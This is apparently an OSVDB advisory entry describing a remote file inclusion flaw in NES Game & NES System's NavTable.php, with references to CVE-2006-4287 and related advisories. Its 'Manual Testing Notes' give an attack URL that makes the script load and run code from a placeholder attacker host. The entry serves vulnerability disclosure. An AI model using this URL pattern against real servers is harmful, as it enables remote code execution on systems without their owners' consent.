NES Game & NES System NavTable.php phphtmllib Variable Remote File Inclusion

2006-08-20T10:03:58
ID OSVDB:28053
Type osvdb
Reporter Kacper(kacper1964@yahoo.pl)
Modified 2006-08-20T10:03:58

Description

Vulnerability Description

NES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to NavTable.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

NES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to NavTable.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[NES_path]/phphtmllib/widgets/NavTable.php?phphtmllib=[http://[attacker]/evil_scripts.txt]

References:

Vendor URL: http://sourceforge.net/projects/nesgame/ Secunia Advisory ID:21593 Related OSVDB ID: 28051 Related OSVDB ID: 28045 Related OSVDB ID: 28050 Related OSVDB ID: 28054 Related OSVDB ID: 28046 Related OSVDB ID: 28047 Related OSVDB ID: 28049 Related OSVDB ID: 28052 Related OSVDB ID: 28044 Related OSVDB ID: 28048 Generic Exploit URL: http://milw0rm.com/exploits/2226 FrSIRT Advisory: ADV-2006-3339 CVE-2006-4287 Bugtraq ID: 19611